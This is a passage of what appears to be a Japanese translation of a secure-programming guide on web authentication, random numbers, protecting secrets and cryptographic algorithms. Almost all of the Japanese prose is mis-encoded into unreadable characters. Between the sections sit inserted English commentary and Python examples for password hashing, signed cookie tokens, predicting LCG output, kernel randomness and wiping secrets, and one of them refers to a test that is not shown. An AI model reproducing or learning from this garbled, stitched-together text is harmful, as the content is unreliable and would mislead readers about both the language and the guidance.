܂Bux[VbNF؁vƂ@gƂ܂ꍇ܂B
̕@ׂ͂ẴuEUT[oŊ{IɔĂ܂B܂Ȃ
ƂɁAx[VbNF؂̓pX[hÍɑ܂Băp
X[h𓐂ݎ͖̂{ɊȒPłBx[VbNF؂͂ďdvł
ȂȂAPƂŏ\ɗ܂Bx[VbNF؂̃pX
[h SSL  TLS ʐM(Í܂)łׂĔ킹Ă܂܂B
̓ptH[}X]ɂ܂Bu_CWFXgF؁vƂg
B͗Dꂽ@łAuEULT|[gĂ킯ł͂
܂BF؏[UI URL ɓ邱Ƃł܂A
͂Ȃ󋵂قƂǂłB̏[N@͂܂ɂ
񑶍݂܂(Ƃ΁AuEȖۑĂ闚OvNV
OA Referer: tB[hoRő Web TCgg)B

ŁA Web ōłǂgĂFؕ@́ANbL[𗘗p
̂łBNbL[́AF؂̂߂ɐ݌vꂽ킯ł͂܂B
FؖړIɂgƂł܂Bg΁AZLeB
̐Ǝコ炵Ă܂܂BӂĂBNbL[ɂďڂ
́AIETF RFC 2965 ȑO̎dlƂƂɌĂBNbL[g
ꍇɁAuEUɂ(Ƃ΁AMicrosoft Internet Explorer 6) vC
oV[Evt@C(p3p.xml ƂOŁAT[õ[gfBNɑ
݂܂)v̂܂B

[Uɂ̓NbL[󂯎ȂlāẢ@ł͂܂肪
_Cɗ߂ĂĂB~΁A̔F؏ HTML tH[
 hidden tB[hoRĂ肷ׂł(啔̃uEUŃT
|[gĂ܂̂ŐSzpł)B܂ł܂ZppāA
f[^[UT[oɑĂƂĂANbL[Ɠ悤ȉ
@gĂĂƎv܂B񂱂̉@ȂA
̃y[W̃LbVAO҂ɐ΂ɎgȂ悤ɂݒ肪K
vɂȂ܂BNbL[gȂ]܂Ƃ͎v܂Ȃ̉
@ł͎ۂɂ͂ɑ̊Jׂ܂B̂߁ÃA
vP[VJ҂FĎŝ͍Ȃ̂ŁA͂̉
@E߂͂܂Bĝ܂ɂ@(J҂
[U)AȂɈSŁAȂɎg₷@ɂĐ
Ǝv܂BقǋJȂłȂAЂƂF؏t
H[ hidden tB[hƈÍNgđĂ(
΁ASSL  TLS)B

Fu [2001] ł́AWeb ɂNCAg̔F؂ɂĘ_Ă܂B
܂łɐ@ƕŁAقƂǂ̃TCgłE߂ł@ł
B̊{IȍĺANCAg̔F؂ɂ́uOC葱v
ǔɑvv2 ɕƂlłBOC葱
ł́AT[o̓[UɃ[UƃpX[h߁A[U͂
AT[o͂ɑ΂āuF؃g[Nvœ܂BNv
ŁANCAg(Web uEU)͔F؃g[NT[o (NGXgƓ
l)܂BT[o̓g[NȂ̂mFAȂ̂Ȃv
Ȃ܂B Seifried [2001]́AWeb ł̔F؂ɂ Fu [2001]ɕCG
łB

 

10.2.1. Web ̔F؁\\OC

OC葱͒ʏ HTML ̃tH[gĎĂ܂B̃tB[
hɂ́AuusernamevupasswordvK؂łBĂ΁AWeb
uEU͎Iɂ܂ɓĂ܂BpX[h́AK
ꂽʐMő悤ɂĂ(https g SSL  TLS 
pʐM)BȂƓlpX[hWłĂ܂܂B
pX[h͂eLXgtB[hׂ͂āApX[ĥ
č쐬ĂB΃pX[h̃eLXg̓[Uʂ
lNǂ߂ȂȂ܂B

[UƃpX[hĂɂ́A[UEAJEg̃f[^x
[X`FbNĂB̃f[^x[Xɂ́ApX[huv
ŕۑȂłBÑf[^x[XRs[Ă܂΁A
ԂɂׂĂ̐lԂ̃pX[hɓ܂(܂Ƀ[U͂
pX[hg܂킵܂)B crypt()gĕꍇ
Acrypt ͂Ƃ͂܂̂ŁAʂ̕@gp
邱ƂE߂܂(͎̉@ŁA Fu [2001]ł͂̓__
܂)B̂ɁA[UEAJEg̃f[^x[Xł́A[U
ƃTg(salt) ̃[Uɑ΂ẴpX[h̃nbVĂ
BTg̓_EV[PXȕŁAU҂pX[h̓f
[^x[X肵ƂĂApX[hôɂ邽߂
g܂B 8 ̃_EV[PXE߂܂B͈ÍI
_łKv͂܂B̃[UƂ͈lɂĂ
BpX[h̃nbV́Auserver key1vƃ[ŨpX[hAT
gȂČvZKv܂BvẐɂ́AÍIɈSȃnb
VASYp܂B server key1 ͔閧ŁÃT[o
Ɉӂɗ^ꂽ̂łB̌̓pX[h̃f[^x[XƂ͕ʂɂ
ĂĂBN server key1 ƃpX[h̓f[^x[X
ɓ΁AvO𓮂ă[ŨpX[hNbNł܂
BpX[hLĂKv͂܂̂ŁAĕGȂ̂ɂ
܂BłSȂ̂ HMAC-SHA-1  HMAC-MD5 łB SHA-1(SHA-1 g
Ƃŉ\ƂȂUAĂ Web TCgł͂قǐSzĂ
)  MD5(q MD5 ɂĂ̋c_Ă) pł܂B

̂悤ɁA[UAJEg쐬鎞ApX[h̓nbVA
pX[hf[^x[XւƓo^܂B[UOC悤
ƁApX[hƂē͂ꂽ̂nbVAf[^x[Xɂ
nbVƔr܂(Ȃ΂܂)B[UpX[h
ύX鎞ɂ́AÂ̂ƐV̗͂܂BVpX[h
 2 ͂܂(~X^CvȂ悤)B܂ŁApX[h
ʂɏoȂƂmFĂB

ftHgŁANbL[găpX[ĥNCAg̃uEU
ɕۑȂłB[U̓NCAgŗpĂ鎞
邩܂(Ƃ΁AC^[lbgJtF̂悤)B]ނȂA
[UɃuEUŁupX[hۑvI^邱Ƃł܂A
ȂApX[h͕KuSȁvڑ̓`ɂg悤ɂ
B܂[UpX[hۑ邱Ƃmɖ]ł邩m
FĂ(ftHgɂĂ͂܂)B

悭py[WăLbVȂ悤ɂĂBvN
VT[olɂ̃y[WȂ悤ɂĂB

[UOCɐȂAT[o̓NCAgɁuF؃g[Nv
NbL[őKv܂B̓_ɂĂ͎ŏqׂ܂B
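The password-storage scheme this section describes (a random salt per user, a keyed hash computed as HMAC-SHA-1 over the password and salt under a server-only key, the new password typed twice on change), as an added example in Python; it is not the page's or Fu et al.'s code. `SERVER_KEY1` stands in for the page's "server key1", the in-memory `db` dict for the user-account database, and the `register_user`/`verify_login`/`change_password` names are constructed.

```python
import hashlib
import hmac
import secrets
from typing import Dict

# Added example, not the page's code. SERVER_KEY1 stands in for the page's
# "server key1"; it would live outside the password database in practice.
SERVER_KEY1 = b"constructed-server-key-1-keep-out-of-the-db"
SALT_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"


def make_salt(length: int = 8) -> str:
    """Random 8-character salt from the kernel CSPRNG (secrets -> os.urandom)."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def password_hash(password: str, salt: str, key: bytes = SERVER_KEY1) -> str:
    """HMAC-SHA-1(server key1, password || salt), as the section describes."""
    msg = password.encode("utf-8") + salt.encode("ascii")
    return hmac.new(key, msg, hashlib.sha1).hexdigest()


def register_user(db: Dict[str, dict], username: str, password: str) -> None:
    """Store only salt and keyed hash; the plaintext never reaches the db."""
    salt = make_salt()
    db[username] = {"salt": salt, "hash": password_hash(password, salt)}


def verify_login(db: Dict[str, dict], username: str, password: str) -> bool:
    record = db.get(username)
    if record is None:
        # Do the same work for unknown users so timing does not reveal
        # which usernames exist.
        password_hash(password, "xxxxxxxx")
        return False
    candidate = password_hash(password, record["salt"])
    return hmac.compare_digest(candidate, record["hash"])


def change_password(db: Dict[str, dict], username: str,
                    old: str, new: str, new_again: str) -> bool:
    """Requires the old password plus the new one typed twice."""
    if new != new_again or not verify_login(db, username, old):
        return False
    register_user(db, username, new)      # fresh salt with the new hash
    return True
```

Someone who copies the database gets salts and HMAC outputs but, without `SERVER_KEY1`, cannot run a dictionary attack against them; someone who gets both still has to grind through each user's salted entries separately.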

 

10.2.2. Web ̔F؃OC̓

[UOCƁAT[o̓NCAgɔF؃g[NƂăNbL
[𑗂Ԃ܂Bg[N͉L̂悤ɂȂ܂B

  exp=t&data=s&digest=m

t ̓g[N̗L(Ƃ΁A)data(Ƃ΁A[UZb
V ID)Adigest ɂ͌_CWFXg܂Budatav
tB[h͕ύXRŁAƂ킩₷O(Ƃ΁A username 
sessionid)ɂĂ܂܂)B_CWFXǵALÍ
nbVƃf[^ÂɂĂBf[^EtB[h
 2 ȏ゠Ȃ(Ƃ΁Ausername  sessionid )A_CWFXg
ɂ͔F؂Ă邷ׂẴtB[h̃tB[hƃf[^lg悤
ɂĂBp^ŘAĂ(u%%vu+vAu&
v)B܂̃p^f[^lƂĂǂ̃tB[hɂȂ悤ɂ
B_CWFXǵAHMAC-MD5  HMAC-SHA1 g悤ɂ
āAʂ̃T[ǒ(key2)pĂB key2 MłȂ
ANT[oŔF؂łȂȂ܂B key2 ύX̂͊ȒP
BύX́AuOCv[UɍĔF؂΂悢ł
Bڂ Fu [2001] ĂB

OC炸ƁAT[o͗LԂƂ̔F؂ɎgĂg[
Ñ_CWFXg`FbNĂBvꍇɂf[^
ĂBg[NȂ΁A[Uɂ̓OCy[WԂ
Ă(hidden tH[̃tB[hāAOC
ԂׂƂ\)B

ZbV ID F؃g[NɓƁAANZXɐł܂B
T[oZbVŃ[Uǂ̃y[WĂ邩uǐՁvł
B܂AĂ܂Ȃy[WɂANZXł܂(Ƃ΁A
̃y[W璼ڃNĂ̂Ƃ)BƂ΁A郆[
U foo.html Ƃy[Wւ̃ANZXF߂ĂāA foo.html Ƃ
y[Wɂ bar1.jpg  bar2.png Ƃ\[XwĂƂ낪
ƂāAbar4.cgi ւ̃ANZXۂł܂BZbV؂邱Ƃ
\łAF؏񂪐Ƃł(ȂƁAU҂l
΂ăT[rXۍU܂)BƂZbV̏ɐ
ƂĂAōU҂ĂANZX𑽏ȂƂł
܂BAU҂ɍU鎞ԂƔF؃g[N΁Aʏ탆[U
悤ɃNunvƂ\łB

ߏ́AF؃g[NKvȂ̂AƂSȐڑ(Ƃ΁ASSL)
f[^𑗂̂KvȂ̂AƂ҂ƂKvȂ̂AƂ_łB
F؃g[NÍ(Sł͂Ȃ)ƁAg[N肷
A[UƓƂL؂܂Ŏsł܂B܂AÍ
ĂȂڑŃf[^𑗂ƁA[UCtȂɍU҂f[^
ύXĂ܂댯܂B̂悤Ƀf[^NύXĂ܂
SzȂA`f[^ɔF؂Ȃ΂܂BÍ̂
F؂󂯎Ă킯ł͂܂񂪁Assׂ𔭌₷Ȃ
B܂\IȃCu TLS  SSL ňÍƔF؂𗼕ƂT|[
gĂ܂BʓIɁAbZ[WÍȂA̔F؂킹
čsĂBvقȂȂA 1 ̂ƂĔF؃g[N
 2 쐬@܂Bg[N 1 ́uSȁvڑs
AdvȑړIɂgp܂BЂƂ̃g[ŃA
قǏdvłȂɗp܂BuSȁvڑ̂߂Ɏgg[N
ɒӂ𕥂āASȐڑ(Í SSL  TLS ڑʓI)ɂ
gĂ悤ɂĂB[UĂȂAF؃g[N
uf[^vSɍ폜ĂB

JԂɂȂ܂AF؃g[NƂȂy[ẂAăLbV
Ȃ悤ɂĂBɂ育ȕ@܂B̃hL
g̍ŏIڕW͏ȂƂ 1 ASȉ@񋟂邱ƂłB\
ȉ@͂񂠂܂B
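The `exp=t&data=s&digest=m` token from this section, issued and checked in Python as an added example (not the page's or Fu et al.'s code). `KEY2` stands in for the server key the text calls key2, and the `issue_token`/`verify_token` names, the 600-second lifetime and the `username`/`sessionid` fields are constructed. The digest is HMAC-SHA1 over the literal string `exp=<t>&data=<s>`, so both field names and values are authenticated; when `data` carries several fields they are joined with `urlencode` and percent-encoded again as the value of `data`, which keeps the inner `&` and `=` from splitting the outer token.

```python
import hashlib
import hmac
import time
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode

# Added example, not from the page or Fu et al.; KEY2 stands in for the
# server key the section calls key2.  Rotating it invalidates every token.
KEY2 = b"constructed-server-key-2"


def _digest(exp: int, data: str, key: bytes) -> str:
    """HMAC-SHA1 over 'exp=<t>&data=<s>': field names are included so an
    attacker cannot move a value from one field to another."""
    msg = f"exp={exp}&data={data}".encode()
    return hmac.new(key, msg, hashlib.sha1).hexdigest()


def issue_token(fields: Dict[str, str], lifetime_s: int,
                now: Optional[float] = None, key: bytes = KEY2) -> str:
    """Build 'exp=t&data=s&digest=m'. `fields` (e.g. username, sessionid)
    are joined with urlencode and percent-encoded once more as the value
    of data, so '&' and '=' inside it never split the token."""
    exp = int(time.time() if now is None else now) + lifetime_s
    data = urlencode(fields)
    return urlencode({"exp": exp, "data": data,
                      "digest": _digest(exp, data, key)})


def verify_token(token: str, now: Optional[float] = None,
                 key: bytes = KEY2) -> Optional[Dict[str, str]]:
    """Return the authenticated fields, or None if the digest fails or the
    token has expired. The digest is checked first, in constant time."""
    parts = parse_qs(token, keep_blank_values=True)
    try:
        exp = int(parts["exp"][0])
        data = parts["data"][0]
        digest = parts["digest"][0]
    except (KeyError, IndexError, ValueError):
        return None
    if not hmac.compare_digest(digest, _digest(exp, data, key)):
        return None
    if (time.time() if now is None else now) >= exp:
        return None
    return {k: v[0] for k, v in parse_qs(data, keep_blank_values=True).items()}
```

A client cannot extend `exp` or change `username` without invalidating `digest`, and changing `KEY2` on the server forces every holder back through the login step, which is the revocation mechanism the section describes.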

 

10.2.3. Web ̔F؁\\OAEg

uOAEgvdg݂[Uɒ񋟂ĂB̓uE
ULĎg[U(Ƃ΁A}ق)ɂƂĂ͓ɕ֗łBu
OAEgv郋[`̖ڂ͒PłBNCAg̔F؃g[N
΂悢łB

 

10.3. 

SKvȃvÓAU҂łȂu_ȁv()
܂܂ȏʂŐȂ΂܂BƂ΃_Ȑɂ́AZ
bV܂ތJ͔閧Ώ̌A܂܂ȃvgRŎgp
Ă nonce(̎Lȏ)⏉xNg(IV)Asalt Y
܂Bz΁A͐^Ƀ_łf[^ɂׂłB
̂悤Ȓlɂ́Aː(KCK[EJE^[̎G𐳊mɌv)
C̎GAdCH̔MG܂BRs[^ɂ́A{̗
Ƃċ@\n[hEFAi𓋍ڂ̂܂Bpł
̂Ȃ痘pĂB

AẴRs[^ɂ͐^ɗ𔭐n[hEFA͂
Ă܂Bŗ𔭐@KvɂȂP[XقƂǂł
B@́AU҂\złȂxɃ_łdg݂K
vɂȂ܂B 3 ̎dg݂KvɂȂ܂B

 E us\ȁvԁB჌x̃foCX(L[͂fBXNEhC
    ũA[̃Wb^())̕ωv邱ƂŎ܂BU
    ͂𐧌ł܂B
   
 E Ípɋ[(PRNG)B͓Ԃgāu
    _vȐ𔭐܂B
   
 E 傫ȃrbg(V[hƌʂƂĎgꂽl̗)Bgl킸
    ȂA͂ PRNG ĂĂʂłBŔAU҂
    U₷Ȃ邩łBKvɂȂrbg͊ɂ
    AÍƂĂpĂ̂ŁAoǍɂ̃[
    Kp܂BΏ̌(Ƃ̌)́AȂƂ 112 rbg(3DES)
    gpĂ܂B128 rbgg΁A܂ɂȂA160 rbgȏ
    SłB
   
ʏAPRNG ͓ԂgČ𐶐܂B̒l₻̑̐ł
͂gďԂXV܂B̎dg݂U@͂񂠂
܂BƂ΁AU҂Ԃւ̓͂𐧌䂵A肵ł
(Iɂł)AU҂́u_ȁvƊo
܂B

PRNG {Ɋ댯Ȃ̂́ARs[^̃Cȗ唼ɁA[
 (PRNG)Ă_ɂ܂B̓ZLeBpɂ͕sK
łBJԂ܂傤BWIȗZLeBpɗpȂ
łBWI PRNG Cu̓V~[^Q[Ɏg
̂ŁÂ悤ȃZLeB̃_\Ɏ
Ă܂BÍĂȂ PRNG CúAu`@p
vnAúv_Ȓĺu(aX+b)modmv(X ͈ȑO̒l)
ČvZ܂B`@pƂėDĂ΁AŗL
ȓvIAړIƂƂɂ҂蓖Ă͂܂܂B̂
 PRNG ̖_́AU҂X̒lȒPɐ_ł_ɂ܂
(_ɌꂽƂĂ)Bf񎟐O
̂悤Ȃ̑̃ASYĂ܂܂[Schneier 1996]B܂
ASKvȃAvP[Vł́AÍIɋł PRNG 𗘗pāA
𐶐Ȃ΂܂BʓIȗCuł͏\ł͂
B

pɐ^̗𐳂łȂƁA肪낢딭܂B
Kerberos  X Window SystemANFS ̃ZLeBz[ł[Venema
1996]B

ł邾AVXeɗpӂĂT[rXgׂł(ʓIɂ̓I
y[eBOVXepӂĂ)B̂悤ȃT[rX́AS
񋟂ł悤ɓɐ݌včĂ邩łBƂ΁ALinux
J[l(1.3.30 )͗ĂāAZLeBpɏ\Ή
ł܂B̗́A͂ŔmCYfoCXhCo⑼
̏񌹂WāAGgs[Ev[Ɏ߂܂B /dev/random ɃA
NZXƃGgs[Ev[ɂmCY琄肳ꂽrbg̔
͂łA_ȒlԂĂ܂(Ggs[Ev[̏ꍇ
A͂mCYW܂Ă܂ŁAĂяoubN܂)B /dev/
urandom ŃANZXāA傫ȒlvƁAGgs[Ev[g
ʂĂlԂĂ܂BÍ̖ړIŗpȂ(Ƃ
΃L[̐̂)A/dev/random gĂB BSDnVXe /
dev/random Ă܂B Solaris  SUNWski pbP[W /dev/random
pӂĂ܂Bn[hEFA̗킪p\ȂAhCoC
Xg[ĂɗpĂBɏڂ́AVXe
IC}jA random(4)QƂĂB

VXeɂẮA^Ƀ_Ȍʂ𓾂̂ɁA̎i{Ȃ
΂Ȃ̂܂B Unix CNȃVXeŉ\ȕ@ 1 
Entropy Gathering Daemon (EGD)܂B̃f[̓VXe̓
ĎāAnbVĂ痐ɂ܂B̃f[́A http:/
/www.lothar.com/tech/crypto 擾ł܂B PRNG ̏o͂ƂāAÍ
nbV@\(Ƃ΁ASHA-1)̗pĂ悢Ǝv܂BnbV
ASYg΁APRNG ̏o͂ł悤ɂȂƂĂAU
҂́AɃnbV@\ЂÂȂ΂ȂȂłB

ŋ͂ PRNG Ȃ΂ȂȂȂAÍIɋł(
ɒGȂ) PRNG ł Yarrow ASY̗p̂ǂł傤
BYarrow ɂĂ http://www.counterpane.com/yarrow.html łɒm
Ƃł܂B PRNG ɂ͑ɂ֗Ɏĝ܂ALp
Ă̂ɂ͊m̎_̂AAvP[Vɂ
͖ɂȂꍇl܂B PRNG ŎO [Kelsey
1998]  [McGraw 2000a]̂悤ȕ𒲂ׂĂB IETF RFC 1750
<http://www.ietf.org/rfc/rfc1750.txt> ׂǂł傤By
FIETF RFC 1750 ̓{́A http://www.ipa.go.jp/security/rfc/
RFC1750JA.html ɂ܂z
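Two points from this section side by side, as an added example in Python (not the page's code): why a textbook `(aX+b) mod m` generator is unusable for security, and where a program on Linux should get key material instead. The `LinearCongruential` class, `predict_after_observing` and `session_key` are constructed names; the multiplier and increment are the sample `rand()` constants from the C standard, chosen only so the arithmetic is recognisable. The attack shown is the one the text states: an observer who sees a single output holds the whole internal state and can reproduce every later value.

```python
import os
from typing import List

# Added example, not the page's code. The LCG constants are the C standard's
# sample rand() values; the point is that the whole sequence is fixed by the
# last value an observer saw, not the quality of any particular constants.


class LinearCongruential:
    """X(n+1) = (a*X(n) + b) mod m, the textbook PRNG the section names."""

    def __init__(self, seed: int, a: int = 1103515245, b: int = 12345,
                 m: int = 2 ** 31) -> None:
        self.a, self.b, self.m = a, b, m
        self.state = seed % m

    def next(self) -> int:
        self.state = (self.a * self.state + self.b) % self.m
        return self.state


def predict_after_observing(observed: int, count: int, a: int = 1103515245,
                            b: int = 12345, m: int = 2 ** 31) -> List[int]:
    """An observer who saw one output has the entire internal state and can
    reproduce every later value, e.g. the 'random' session IDs handed to
    other users afterwards."""
    clone = LinearCongruential(observed, a, b, m)
    return [clone.next() for _ in range(count)]


def session_key(nbits: int = 128) -> bytes:
    """Key material from the kernel pool: os.urandom reads /dev/urandom on
    Linux (getrandom(2) on recent kernels), never a userland PRNG."""
    if nbits % 8 or nbits < 128:
        raise ValueError("use at least 128 bits, a whole number of bytes")
    return os.urandom(nbits // 8)


def read_dev_random(nbytes: int) -> bytes:
    """Direct read of /dev/random for long-lived keys, as the section
    recommends; may block until the kernel has gathered enough entropy."""
    with open("/dev/random", "rb", buffering=0) as fd:
        return fd.read(nbytes)
```

`session_key` is the call to use for session secrets and nonces; `read_dev_random` is the blocking variant for keys that must last, and it is deliberately not exercised in the test since it can stall on an entropy-starved machine.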

 

10.4. [UԂł͂Ƃ킯閧(pX[h⌮)

AvP[VpX[hJ(ZbV閧)Kv
ȂAJŏɂƂǂ߂邽߂ɁAgp͂ɏ㏑Ă
BƂ΁AJava ł String ^ɃpX[hۑȂłB
String ^͕ύXȂł(K[xWRNg邩Aėp
A㏑܂BȂɂ͎Ԃł傤)B String ^
̂ɁAchar[] găpX[hۑĂB΂
ɏ㏑܂B

܂AvÔ悤Ȕ閧̒lȂARA_v΍
悤ɂĂ(ulimit g)BȂƍU҂vO
fāA_vf[^閧̒lo܂B
1 ӂȂ΂ȂȂ_܂B́AʃvZXfobK
[ (Ƃ΁Aptrace(2)gA/proc ̋[t@CVXeg
肵)ĂяoƂŁÃvZXĎł_ł[Venema 1996]B
J[l͒ʏÃvZX setuid  setgid ĂƂ̂
ȊĎ[`vZXی삵܂(ÂJ[lł͕ی삪܂
Bی삷邽߂ɂ̓AbvO[h邵@͂܂)B܂Av
ZX閧̒lȂÃvO(ȂO[v⃆
[U)setuid  setgid āA̎̊ĎIɋ֎~
悤ɂĂB
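The two defensive measures this section asks for (overwrite the secret as soon as it is no longer needed, and stop a crash from dumping it to disk), as an added example in Python rather than the page's Java. A `bytearray` is the Python analogue of the `char[]` the text recommends over `String`: it is mutable, so the program can zero it in place. The `Secret` class, `disable_core_dumps` and `use_password` are constructed names; `disable_core_dumps` sets `RLIMIT_CORE` to zero through the standard `resource` module, the programmatic form of `ulimit -c 0`.

```python
from typing import Optional

try:
    import resource               # POSIX only; absent on Windows
except ImportError:
    resource = None

# Added example, not from the page. bytearray is the Python analogue of the
# section's Java advice to hold passwords in char[] rather than String:
# it is mutable, so the program can overwrite it as soon as it is done.


class Secret:
    """Keeps a key/password in a bytearray and zeroes it on release.
    Caveat: copies the interpreter made elsewhere (the original literal,
    a bytes() handed to a library) are not covered by wipe()."""

    def __init__(self, value: bytes) -> None:
        self._buf = bytearray(value)

    def expose(self) -> bytes:
        # Temporary copy for an API that needs bytes; drop it promptly.
        return bytes(self._buf)

    def wipe(self) -> None:
        for i in range(len(self._buf)):
            self._buf[i] = 0

    def is_wiped(self) -> bool:
        return all(b == 0 for b in self._buf)

    def __enter__(self) -> "Secret":
        return self

    def __exit__(self, *exc) -> None:
        self.wipe()               # runs on normal exit and on exceptions


def disable_core_dumps() -> bool:
    """ulimit -c 0 for this process: a crash must not write the secret to
    disk. Returns True when the limit is now (0, 0)."""
    if resource is None:
        return False
    try:
        resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
    except (ValueError, OSError):
        return False
    return resource.getrlimit(resource.RLIMIT_CORE) == (0, 0)


def use_password(password: bytes) -> int:
    """Typical pattern: do the work inside a with-block so the secret is
    wiped however the block is left. Returns a stand-in result."""
    with Secret(password) as s:
        return len(s.expose())
```

Call `disable_core_dumps()` early in `main`; it only lowers the limit for this process and its children, which is exactly the scope a setuid or daemon program wants.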

 

10.5. ÍASYƃvgR

ÍASYvgŔAVXëSێ̂ɕKvł
BC^[lbĝ悤ɐMłȂlbg[NoRĒʐMꍇ
́AɕKvɂȂ܂Bł邾ÍZpgďF؂A閧
ێĂ(AÍF؂Iɂ܂sĂƁAP
Ɏv܂Ȃł)BʓIɂ́AK؂ȃc[găAvP[
VSɂKv܂B

܂ł̔wim肽΁AȃeLXgłuApplied
Cryptographyv [Schneier 1996]ǂłBusci.cryptvj[XO
[v́AFAQ 𒀎oĂ܂BŎɓ܂Ahttp://
www.landfield.com/faqs/cryptography-faq ɂ܂B Linux Encryption
HOWTO ܂ Linux ŗL̏񌳂 http://marc.mutz.com/Encryption-HOWTO
/ łBvgRǂ̂悤Ȋ{IASY𗘗pĂ邩ɂ
ẮA [Opplinger 1998]ĂBvgRɂǂĈÍKp
邩ɂẮAhLg̃RNVƂ [Stallings 1996]
܂Bł킸łA܂BeɂȂĂ܂
ŁALm肽Ȃ΁Aʂ̂ƂQƂĂB

ÍvgRÍASY𐳂͍̂Ȃ̂ŁA
ō낤Ƃ͂ȂłB̂ɁALpAO
͂ꂽvgRASY𗘗pĂBꂪSȂ
ƗĂBÍɊ֘Â쐬Ȃ΂ȂȂɂ́A
r[LJAZLeB͂̐Ƃ𒲍ł悤
Ȃ΂܂BÍ̐ƂŁAĂ邩cA
NăASY̐Ƃ̃r[󂯂v𗧂ĂȂ
΁AÍASY쐬悤ȂƂ͂ȂłB (炩
łɗ)ÍASY̍쐬́AƂɋꂽƂłB

ASY͓̑Ă܂BL҂up͎RvAƂ
_ŔF߂ĂƂĂA_񏑂ɏĂȂ΁AL҂̋C
ɂȂĕςāAőȃXNwƂɂȂ܂Bē
̂ASYׂ͂ĔĂBقƂǂǂȃP[XłA
ɒGȂ@܂B܂̉@́AȂƂ
̂ƓAȏɗDꂽZpgĂ܂BĂ
A@IȖ̐Xł܂B

 

10.5.1. ÍvgR

vgR͕WœKĂ SSL(܂Ȃ TLS ) SSHAIPSecAGnuPG
/PGPA Kerberos g悤ɂĂB@\̂͂ꂼ
ԂĂ܂Ấuӂ́vĂ܂B SSL(܂Ȃ
TLS)́A http(Web)̂ی삷@łB PGP ݊vg
R(PGP  GnuPG Ŏ)́A[݊ԂňSȓdq[
肷@łB Kerberos ͖{ALAN ŔF؂SɃT|[g
@łB܂A閧Ldg݂\z܂(܂AۂɒʐMی
ASY͕ʂɕKvɂȂ܂)B SSH ͂C^[lbgz
Ɂuꂽ[vSɂ@łBƂ΁Atelnet  X Window
System ̂悤Ȃ̂ΏۂɂĂ܂B̃f[^EXg[(CVS
ւ̃ANZX̂悤)SɂꍇɂǂgĂ܂B SSH v
gRɂ̓W[ 2 ̃o[W݂Ă邱ƂɒӂĂ
B܂̃^Cv̑I邱ƂɂӂĂB
͂ꂼ̃hLgQƂĂB OpenSSH ́ASSH 
I[v\[XŎ 1 łB IPSec ͂჌xŃpPbgu
ׂāvSɂ@łBāAzvCx[gElbg[
N(VPN)◣ꂽƂɂ}VSɂ̂ɕ֗łBC^[lb
gEvgR̐Vo[Wł IPv6  IPSec ugݍŁv
܂AʓI IPv4 ł IPSec ͓삵܂B

܂܂ȃvgRŁA낢ȃASYpł܂B
ăftHgƂāAK؂ȃASYIKv܂(Ƃ
AÍASY)B

 

10.5.2. Ώ̌̈ÍASY

ÍASY̗pAóAŋKĂP[XA
@͍XƉ肳܂BÍgăAvP[V\z悤Ƃ
OɁA@ǂȂĂ邩𒲍ĂB

閧(ȃf[^ł)̈ÍASÝAI[vɌJĂ
āAN̍Uɑς̂𗘗pĂB̏Ԃ
ĂBƂẮARijndahl ƂėL Advanced Encryption
Standard(AES)̗p𐄏܂B吨̈Í҂͂āAd
Ȏ_ȂƂ킩Ă܂B́Ał͏\ɐM
ɑƐMĂ܂B AES ̂ƂėDĂ̂́ASerpent A
SYłB̃ASY͏XᑬłAUɑ΂Ă
Ă͂łBAvP[V̑ɂƂāAtriple-DES ͔ɗDꂽ
ÍASYłBKx(112 rbg)A܂
AUɒNςĂт܂(JAKxȌ
ÍASY̒ŁAقǒԍUɑςĂ̂͑ɂ
܂)BAtriple-DES ̓\tgEFAŎĂƔɒᑬ
ŁAtriple-DES ́uSxvƎvĂ܂B Twofish ͗Dꂽ
ASYłAȂȂ^ʂ܂B́ASean
Murphy  Fauzan Mirza  Twofish ͂̊w҂L
AƂĂ_ł(̂ƂN̏LƂƂ͂Ă
܂)B MARS ́uV̎aVȁvUɑ΂ĒR͂͂łBA
蕡GŁAᐫ\ IC J[hőΉ͔̂񌻎IłB̂ƂA
 Twofish ̗p܂BŔAm Twofish ͌Ă邱
͂ȂƎv܂A݂mF̂łB݂
ȂASYɂ݂Ă܂̂ŁB IDEA ͎gȂł
BčƉB̓ɂ΂Ă܂B萔╶萔 XOR 悤Ȃ
̂ ROT(]uÍ)@rWlÍAlȂȃASYgȂ
łB݂͌̃Rs[^Ȃ킯Ȃj܂Budouble
DESv(DES  2 x)͎gȂłB triple-DES ł͋N
uman in the middle Uvɂ₷łBƂɂAvgR
̈ÍASYT|[gĂ悤ɂĂB
΁AÍASYĂA[U͕ʂ̃ASYɕύX
ł܂̂ŁBy󒐁Fuman in the middle UvɂẮA MITM
āH <http://www.vicus-oryzae.com/gorua/mitm.html> QlɂȂ܂z

Ώ̌̈Í(Ƃ΁AȈÍ)ɂ́A 2016 N܂Ŕ閧
ۂȂA90 rbg菬𗘗pȂł(Ƀrb
g𑝂₹΁Arbg 18 ZLeBێԂ܂)
[Blaze 1996]BقǏdvłȂf[^ÍȂAȑO炠
DES ASY𗧂ꍇ܂Bŋ߂̃n[hEFAȂ炢
ƂȒPɑU DES  56 rbgj܂B DES gĂ
ȂAƂ ASCII eLXggȂ悤ɂĂBpeB
ŉ(ŏʂł͂Ȃ)rbgɂ܂ADES ASY̑́AU
҂悭mĂ܂Ă錮lgĈÍĂ܂B̂A
̃nbV쐬AԈႢȂpeBErbgɐݒ肵Ă(Í
[`oG[bZ[Wɂ͒ӂ𕥂Ă)BAo
ÍASÝALȌ 40 rbgɂȂĂ܂B
ł͈Ӗ܂B 1996 Nɂ͍U҂ 10,000 h₵ 12
ł̂悤Ȍj܂ARs[^󂢂Ă鎞ԂgĐ
Ōj܂Bǂ̃P[XAĵ 18̔̎Ԃ
Ă̂ɂłB

ubNÍASÝA낢ȃ[hgĂ܂BƂ
Auelectronic code bookv(ECB)ucipher block chainingv(CBC)
B CBC 𗘗p̂ʓIłAECB [h͎gȂłB
ECB [hł́AXg[ŁAf[^ubNɓʂ
܂Bł͈Íꂽ̂Ȃ̂A\Ă悤Ȃ̂ł
B CBC [h܂ރ[h́AuxNgv(IV)KvƂꍇ
܂B IV 閧ɂKv͂܂񂪁AU҂\ł悤
͂܂BZbV܂ IV ėpĂ͂܂BZb
V͂߂xɁAV IV gĂB

Xg[ÍASY͂낢날܂A啔ɔ
܂BɈ炸AZpIɖ̖̂ɁAWAKE ܂B
